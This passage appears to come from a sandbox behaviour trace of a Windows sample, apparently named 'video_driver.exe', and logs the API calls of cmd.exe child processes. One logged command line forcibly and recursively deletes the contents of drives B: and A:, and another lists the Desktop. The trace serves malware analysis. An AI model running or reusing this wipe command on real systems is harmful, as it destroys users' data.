lpType=0x20e754*=0x0, lpData=0x20e758*=0x40, lpcbData=0x20e750*=0x1000) returned 0x2 [0057.049] RegCloseKey (hKey=0x68) returned 0x0 [0057.049] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e74c | out: phkResult=0x20e74c*=0x68) returned 0x0 [0057.049] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x0, lpData=0x20e758*=0x40, lpcbData=0x20e750*=0x1000) returned 0x2 [0057.049] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x1, lpcbData=0x20e750*=0x4) returned 0x0 [0057.049] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x0, lpData=0x20e758*=0x1, lpcbData=0x20e750*=0x1000) returned 0x2 [0057.049] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x0, lpcbData=0x20e750*=0x4) returned 0x0 [0057.049] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x9, lpcbData=0x20e750*=0x4) returned 0x0 [0057.050] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x4, lpData=0x20e758*=0x9, lpcbData=0x20e750*=0x4) returned 0x0 [0057.050] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e754, lpData=0x20e758, lpcbData=0x20e750*=0x1000 | out: lpType=0x20e754*=0x0, lpData=0x20e758*=0x9, lpcbData=0x20e750*=0x1000) returned 0x2 [0057.050] RegCloseKey (hKey=0x68) returned 0x0 [0057.050] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b65 [0057.050] srand (_Seed=0x5eb34b65) [0057.050] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"B:\" del /f /s /q \"B:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q" [0057.050] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"B:\" del /f /s /q \"B:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q" [0057.050] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.050] GetProcessHeap () returned 0x3d0000 [0057.050] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x210) returned 0x3e20f8 [0057.050] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0057.050] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0057.050] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0057.050] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.051] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0057.051] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0057.051] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0057.051] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0057.051] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0057.051] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0057.051] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0057.051] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0057.051] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0057.051] GetProcessHeap () returned 0x3d0000 [0057.051] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e2bd0 | out: hHeap=0x3d0000) returned 1 [0057.051] GetEnvironmentStringsW () returned 0x3e2310* [0057.051] GetProcessHeap () returned 0x3d0000 [0057.051] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xae2) returned 0x3e4c70 [0057.051] FreeEnvironmentStringsW (penv=0x3e2310) returned 1 [0057.051] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0057.051] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.051] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0057.051] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0057.051] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0057.051] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0057.051] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0057.051] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0057.051] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0057.051] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0057.051] GetProcessHeap () returned 0x3d0000 [0057.052] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x54) returned 0x3e17c8 [0057.052] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f518 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.052] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x20f518, lpFilePart=0x20f514 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x20f514*="Desktop") returned 0x25 [0057.052] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0057.052] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f294 | out: lpFindFileData=0x20f294*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3e5760 [0057.052] FindClose (in: hFindFile=0x3e5760 | out: hFindFile=0x3e5760) returned 1 [0057.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x20f294 | out: lpFindFileData=0x20f294*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x108960, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x108960, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3e5760 [0057.052] FindClose (in: hFindFile=0x3e5760 | out: hFindFile=0x3e5760) returned 1 [0057.052] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0057.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x20f294 | out: lpFindFileData=0x20f294*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3e5760 [0057.052] FindClose (in: hFindFile=0x3e5760 | out: hFindFile=0x3e5760) returned 1 [0057.053] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0057.053] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0057.053] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0057.053] GetProcessHeap () returned 0x3d0000 [0057.053] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e4c70 | out: hHeap=0x3d0000) returned 1 [0057.053] GetEnvironmentStringsW () returned 0x3e4180* [0057.053] GetProcessHeap () returned 0x3d0000 [0057.053] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb36) returned 0x3e5fa0 [0057.053] FreeEnvironmentStringsW (penv=0x3e4180) returned 1 [0057.053] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.053] GetProcessHeap () returned 0x3d0000 [0057.053] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e17c8 | out: hHeap=0x3d0000) returned 1 [0057.053] GetProcessHeap () returned 0x3d0000 [0057.053] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x400e) returned 0x3e6ae0 [0057.054] GetProcessHeap () returned 0x3d0000 [0057.054] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xa0) returned 0x3e2e50 [0057.054] GetProcessHeap () returned 0x3d0000 [0057.054] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e6ae0 | out: hHeap=0x3d0000) returned 1 [0057.054] GetConsoleOutputCP () returned 0x1b5 [0057.054] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0057.054] GetUserDefaultLCID () returned 0x409 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f658, cchData=128 | out: lpLCData="0") returned 2 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f658, cchData=128 | out: lpLCData="0") returned 2 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f658, cchData=128 | out: lpLCData="1") returned 2 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0057.055] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0057.056] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0057.057] GetProcessHeap () returned 0x3d0000 [0057.057] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x20c) returned 0x3e2ef8 [0057.057] GetConsoleTitleW (in: lpConsoleTitle=0x3e2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0057.057] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0057.057] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0057.057] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0057.057] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0057.058] GetProcessHeap () returned 0x3d0000 [0057.058] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x400a) returned 0x3e6ae0 [0057.058] GetProcessHeap () returned 0x3d0000 [0057.058] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x4008) returned 0x3eaaf8 [0057.058] GetProcessHeap () returned 0x3d0000 [0057.058] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x1a) returned 0x3e57e0 [0057.058] GetEnvironmentVariableW (in: lpName="p IN (\"A", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.058] _wcsicmp (_String1="p IN (\"A", _String2="CD") returned 13 [0057.058] _wcsicmp (_String1="p IN (\"A", _String2="ERRORLEVEL") returned 11 [0057.058] _wcsicmp (_String1="p IN (\"A", _String2="CMDEXTVERSION") returned 13 [0057.058] _wcsicmp (_String1="p IN (\"A", _String2="CMDCMDLINE") returned 13 [0057.058] _wcsicmp (_String1="p IN (\"A", _String2="DATE") returned 12 [0057.058] _wcsicmp (_String1="p IN (\"A", _String2="TIME") returned -4 [0057.058] _wcsicmp (_String1="p IN (\"A", _String2="RANDOM") returned -2 [0057.058] _wcsicmp (_String1="p IN (\"A", _String2="HIGHESTNUMANODENUMBER") returned 8 [0057.059] GetProcessHeap () returned 0x3d0000 [0057.059] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e57e0 | out: hHeap=0x3d0000) returned 1 [0057.059] GetProcessHeap () returned 0x3d0000 [0057.059] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3eaaf8 | out: hHeap=0x3d0000) returned 1 [0057.059] GetProcessHeap () returned 0x3d0000 [0057.059] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x4008) returned 0x3eaaf8 [0057.059] GetProcessHeap () returned 0x3d0000 [0057.059] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3eaaf8 | out: hHeap=0x3d0000) returned 1 [0057.059] GetProcessHeap () returned 0x3d0000 [0057.059] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e6ae0 | out: hHeap=0x3d0000) returned 1 [0057.059] _wcsicmp (_String1="if", _String2=")") returned 64 [0057.059] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0057.059] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0057.059] _wcsicmp (_String1="IF", _String2="if") returned 0 [0057.059] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0057.059] GetProcessHeap () returned 0x3d0000 [0057.059] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e3110 [0057.059] GetProcessHeap () returned 0x3d0000 [0057.059] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xe) returned 0x3dffc0 [0057.060] GetProcessHeap () returned 0x3d0000 [0057.060] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x20) returned 0x3e57e0 [0057.060] GetProcessHeap () returned 0x3d0000 [0057.060] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3e57e0, Size=0x16) returned 0x3e1800 [0057.060] GetProcessHeap () returned 0x3d0000 [0057.060] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3e1800) returned 0x16 [0057.060] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0057.061] GetProcessHeap () returned 0x3d0000 [0057.061] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e3170 [0057.061] GetProcessHeap () returned 0x3d0000 [0057.061] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x14) returned 0x3e31d0 [0057.061] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0057.061] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0057.061] GetProcessHeap () returned 0x3d0000 [0057.061] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x12) returned 0x3e31f0 [0057.061] GetProcessHeap () returned 0x3d0000 [0057.061] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x1c) returned 0x3e57e0 [0057.061] GetProcessHeap () returned 0x3d0000 [0057.061] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3e57e0, Size=0x14) returned 0x3e3210 [0057.061] GetProcessHeap () returned 0x3d0000 [0057.062] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3e3210) returned 0x14 [0057.062] _wcsicmp (_String1="del", _String2=")") returned 59 [0057.062] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0057.062] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0057.062] _wcsicmp (_String1="IF", _String2="del") returned 5 [0057.062] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0057.062] _wcsicmp (_String1="REM", _String2="del") returned 14 [0057.062] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0057.062] GetProcessHeap () returned 0x3d0000 [0057.062] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e3230 [0057.062] GetProcessHeap () returned 0x3d0000 [0057.062] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x10) returned 0x3dffd8 [0057.062] GetProcessHeap () returned 0x3d0000 [0057.063] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x28) returned 0x3e3290 [0057.063] GetProcessHeap () returned 0x3d0000 [0057.063] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e32c0 [0057.063] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0057.064] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0057.064] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0057.064] GetProcessHeap () returned 0x3d0000 [0057.064] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e3320 [0057.064] GetProcessHeap () returned 0x3d0000 [0057.064] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x44) returned 0x3e3380 [0057.064] GetProcessHeap () returned 0x3d0000 [0057.064] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x14) returned 0x3e33d0 [0057.064] GetProcessHeap () returned 0x3d0000 [0057.064] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3e33d0, Size=0x12) returned 0x3e33d0 [0057.064] GetProcessHeap () returned 0x3d0000 [0057.064] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3e33d0) returned 0x12 [0057.064] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0057.064] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0057.064] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0057.065] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0057.065] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0057.065] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0057.065] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0057.065] GetProcessHeap () returned 0x3d0000 [0057.065] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x12) returned 0x3e33f0 [0057.066] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0057.066] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0057.066] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0057.066] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0057.066] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0057.066] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0057.066] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0057.066] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0057.066] GetProcessHeap () returned 0x3d0000 [0057.066] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e3410 [0057.067] GetProcessHeap () returned 0x3d0000 [0057.067] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x14) returned 0x3e3470 [0057.067] GetProcessHeap () returned 0x3d0000 [0057.067] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x20) returned 0x3e57e0 [0057.068] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0057.070] GetFullPathNameW (in: lpFileName="B:", nBufferLength=0x208, lpBuffer=0x20f348, lpFilePart=0x20f0f4 | out: lpBuffer="B:\\", lpFilePart=0x20f0f4*=0x0) returned 0x3 [0057.070] wcsncmp (_String1="B:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -26 [0057.074] GetFileAttributesW (lpFileName="B:\\" (normalized: "b:")) returned 0xffffffff [0057.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.074] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0057.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.074] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0057.074] _get_osfhandle (_FileHandle=0) returned 0x3 [0057.074] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0057.075] SetConsoleInputExeNameW () returned 0x1 [0057.075] GetConsoleOutputCP () returned 0x1b5 [0057.075] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0057.075] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.075] exit (_Code=0) Process: id = "22" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4472b000" os_pid = "0x848" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x55c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c dir /b \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 27 os_tid = 0x858 [0057.152] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f84c | out: lpSystemTimeAsFileTime=0x20f84c*(dwLowDateTime=0x18d6560, dwHighDateTime=0x1d62400)) [0057.152] GetCurrentProcessId () returned 0x848 [0057.152] GetCurrentThreadId () returned 0x858 [0057.152] GetTickCount () returned 0x114675b [0057.152] QueryPerformanceCounter (in: lpPerformanceCount=0x20f844 | out: lpPerformanceCount=0x20f844*=17728549917) returned 1 [0057.154] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0057.154] __set_app_type (_Type=0x1) [0057.154] __p__fmode () returned 0x770331f4 [0057.154] __p__commode () returned 0x770331fc [0057.154] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0057.154] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0057.155] GetCurrentThreadId () returned 0x858 [0057.155] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x858) returned 0x60 [0057.155] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0057.155] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0057.155] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.247] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0057.247] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f7dc | out: phkResult=0x20f7dc*=0x0) returned 0x2 [0057.247] VirtualQuery (in: lpAddress=0x20f813, lpBuffer=0x20f7ac, dwLength=0x1c | out: lpBuffer=0x20f7ac*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.247] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f7ac, dwLength=0x1c | out: lpBuffer=0x20f7ac*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0057.247] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f7ac, dwLength=0x1c | out: lpBuffer=0x20f7ac*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0057.247] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f7ac, dwLength=0x1c | out: lpBuffer=0x20f7ac*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.247] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f7ac, dwLength=0x1c | out: lpBuffer=0x20f7ac*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0057.247] GetConsoleOutputCP () returned 0x1b5 [0057.248] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0057.248] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0057.248] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.248] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0057.248] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.248] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 0 [0057.248] _get_osfhandle (_FileHandle=0) returned 0x3 [0057.248] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0057.249] GetEnvironmentStringsW () returned 0x682170* [0057.249] GetProcessHeap () returned 0x670000 [0057.249] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, 